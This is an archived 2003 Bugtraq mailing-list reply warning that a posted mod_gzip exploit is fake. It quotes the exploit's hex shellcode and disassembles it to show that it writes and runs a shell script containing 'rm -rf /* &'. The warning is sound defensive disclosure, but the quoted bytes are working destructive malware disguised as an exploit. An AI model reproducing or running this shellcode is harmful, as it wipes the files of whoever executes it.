lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Sun, 23 Nov 2003 12:52:16 +0100
From: Przemyslaw Frasunek <venglin@...ebsd.lublin.pl>
To: bugtraq@...urityfocus.com
Subject: Re: m00-mod_gzip.c


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

d4rkgr3y wrote:
> /* m00-mod_gzip.c

Do NOT run it, this is a fake exploit, which calls rm -rf /:

> char default_shellcode[] =
> "\x31\xC0\x50\x68\x2F\x62\x69\x6E\x89\xE3\xB0\x0C\xCD\x80\x31\xC0\x50"
> "\x68\x7A\x7A\x7A\x7A\x89\xE3\x6A\x41\x59\xB0\x05\xCD\x80\x31\xC9\x51"
> "\x68\x2F\x2A\x20\x26\x68\x2D\x72\x66\x20\x68\x0A\x72\x6D\x20\x68\x6B"
> "\x69\x6C\x6C\x68\x20\x2D\x66\x20\x68\x68\x0A\x72\x6D\x68\x69\x6E\x2F"
> "\x73\x68\x23\x21\x2F\x62\x89\xE1\x89\xC3\xB2\x20\xB0\x04\xCD\x80\xB0"
> "\x06\xCD\x80\x31\xC0\x50\x68\x7A\x7A\x7A\x7A\x89\xE3\x66\xB9\xED\x01"
> "\xB0\x0F\xCD\x80\x31\xC0\x31\xD2\x50\x68\x7A\x7A\x7A\x7A\x68\x2E\x2F"
> "\x2F\x2F\x89\xE3\x50\x53\x89\xE1\xB0\x0B\xCD\x80\x31\xC0\x40\xCD\x80";

0x0804a5a0 <default_shellcode+0>:       xor    %eax,%eax
0x0804a5a2 <default_shellcode+2>:       push   %eax
0x0804a5a3 <default_shellcode+3>:       push   $0x6e69622f
0x0804a5a8 <default_shellcode+8>:       mov    %esp,%ebx
0x0804a5aa <default_shellcode+10>:      mov    $0xc,%al
0x0804a5ac <default_shellcode+12>:      int    $0x80  -> chdir("/bin")
0x0804a5ae <default_shellcode+14>:      xor    %eax,%eax
0x0804a5b0 <default_shellcode+16>:      push   %eax
0x0804a5b1 <default_shellcode+17>:      push   $0x7a7a7a7a
0x0804a5b6 <default_shellcode+22>:      mov    %esp,%ebx
0x0804a5b8 <default_shellcode+24>:      push   $0x41
0x0804a5ba <default_shellcode+26>:      pop    %ecx
0x0804a5bb <default_shellcode+27>:      mov    $0x5,%al
0x0804a5bd <default_shellcode+29>:      int    $0x80  -> open("zzzz", 0x41)
0x0804a5bf <default_shellcode+31>:      xor    %ecx,%ecx
0x0804a5c1 <default_shellcode+33>:      push   %ecx
0x0804a5c2 <default_shellcode+34>:      push   $0x26202a2f
0x0804a5c7 <default_shellcode+39>:      push   $0x2066722d
0x0804a5cc <default_shellcode+44>:      push   $0x206d720a
0x0804a5d1 <default_shellcode+49>:      push   $0x6c6c696b
0x0804a5d6 <default_shellcode+54>:      push   $0x20662d20
0x0804a5db <default_shellcode+59>:      push   $0x6d720a68
0x0804a5e0 <default_shellcode+64>:      push   $0x732f6e69
0x0804a5e5 <default_shellcode+69>:      push   $0x622f2123
0x0804a5ea <default_shellcode+74>:      mov    %esp,%ecx
0x0804a5ec <default_shellcode+76>:      mov    %eax,%ebx
0x0804a5ee <default_shellcode+78>:      mov    $0x20,%dl
0x0804a5f0 <default_shellcode+80>:      mov    $0x4,%al
0x0804a5f2 <default_shellcode+82>:      int    $0x80  -> write(fd, "#!/bin/sh
rm -f kill
rm -rf /* &", 0x20);
0x0804a5f4 <default_shellcode+84>:      mov    $0x6,%al
0x0804a5f6 <default_shellcode+86>:      int    $0x80  -> close(fd)
0x0804a5f8 <default_shellcode+88>:      xor    %eax,%eax
0x0804a5fa <default_shellcode+90>:      push   %eax
0x0804a5fb <default_shellcode+91>:      push   $0x7a7a7a7a
0x0804a600 <default_shellcode+96>:      mov    %esp,%ebx
0x0804a602 <default_shellcode+98>:      mov    $0x1ed,%cx
0x0804a606 <default_shellcode+102>:     mov    $0xf,%al
0x0804a608 <default_shellcode+104>:     int    $0x80  -> chmod("zzz", 0755)
0x0804a60a <default_shellcode+106>:     xor    %eax,%eax
0x0804a60c <default_shellcode+108>:     xor    %edx,%edx
0x0804a60e <default_shellcode+110>:     push   %eax
0x0804a60f <default_shellcode+111>:     push   $0x7a7a7a7a
0x0804a614 <default_shellcode+116>:     push   $0x2f2f2f2e
0x0804a619 <default_shellcode+121>:     mov    %esp,%ebx
0x0804a61b <default_shellcode+123>:     push   %eax
0x0804a61c <default_shellcode+124>:     push   %ebx
0x0804a61d <default_shellcode+125>:     mov    %esp,%ecx
0x0804a61f <default_shellcode+127>:     mov    $0xb,%al
0x0804a621 <default_shellcode+129>:     int    $0x80  ->
execve("/bin/zzzz", "/bin/zzzz", 0)
0x0804a623 <default_shellcode+131>:     xor    %eax,%eax
0x0804a625 <default_shellcode+133>:     inc    %eax
0x0804a626 <default_shellcode+134>:     int    $0x80  -> exit()
0x0804a628 <default_shellcode+136>:     add    %al,(%eax)
0x0804a62a <default_shellcode+138>:     add    %al,(%eax)
0x0804a62c <default_shellcode+140>:     add    %al,(%eax)
0x0804a62e <default_shellcode+142>:     add    %al,(%eax)
0x0804a630 <default_shellcode+144>:     add    %al,(%eax)
0x0804a632 <default_shellcode+146>:     add    %al,(%eax)
0x0804a634 <default_shellcode+148>:     add    %al,(%eax)
0x0804a636 <default_shellcode+150>:     add    %al,(%eax)
0x0804a638 <default_shellcode+152>:     add    %al,(%eax)
0x0804a63a <default_shellcode+154>:     add    %al,(%eax)
0x0804a63c <default_shellcode+156>:     add    %al,(%eax)
0x0804a63e <default_shellcode+158>:     add    %al,(%eax)

[...]
> 	(long) range=default_shellcode;
> 	range();
[...]

- --
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NICHDL: PMF9-RIPE *
* Inet: przemyslaw@...sunek.com ** keyId: 2578FCAD ** HAM-RADIO: SQ8JIV *
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQE/wJ9vkxEnBiV4/K0RAldLAKDam66ZCmIiqoGUn3eqpp25ucyVXgCgvSRS
9bc6c5pGkgncYeToNPsZeeM=
=jxIK
-----END PGP SIGNATURE-----



Powered by blists - more mailing lists